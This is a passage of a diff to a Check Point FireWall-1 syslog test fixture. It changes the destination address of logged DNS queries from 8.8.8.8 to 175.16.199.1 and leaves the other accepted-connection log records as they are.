FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505553"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e511,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505553"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48030"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e511,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505553"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47745"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e511,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505553"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48030"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e512,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36980"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e513,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:12:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e513,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50721"; service:"443"; service_id:"https"; src:"192.168.1.117"] 
@@ -3698,17 +3698,17 @@
 <134>1 2020-03-29T18:12:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e514,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38880"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10184"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:12:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e514,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56508"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:12:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e514,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51264"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10185"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38271"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42544"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43769"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38271"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42544"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43769"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38056"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47022"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & 
FireWall-1"; proto:"17"; s_port:"43486"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43486"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58966"; 
service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54105"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54105"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58822"; service:"443"; service_id:"https"; src:"192.168.2.2"]
